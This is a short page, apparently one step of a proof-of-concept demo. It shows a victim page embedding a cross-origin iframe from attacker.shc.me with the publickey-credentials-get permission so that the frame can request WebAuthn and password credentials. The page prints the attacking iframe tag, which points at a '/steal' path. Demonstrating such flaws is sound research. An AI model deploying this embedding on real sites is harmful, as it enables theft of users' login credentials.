Step 3: Attack Page

What's happening:

This page on victim.shc.me embeds a cross-origin iframe from attacker.shc.me with the publickey-credentials-get Permissions Policy.

The attacker iframe will request credentials using the combined WebAuthn + Password path.

<iframe src="https://attacker.shc.me/steal" allow="publickey-credentials-get">

CROSS-ORIGIN IFRAME from attacker.shc.me:



← Back to login page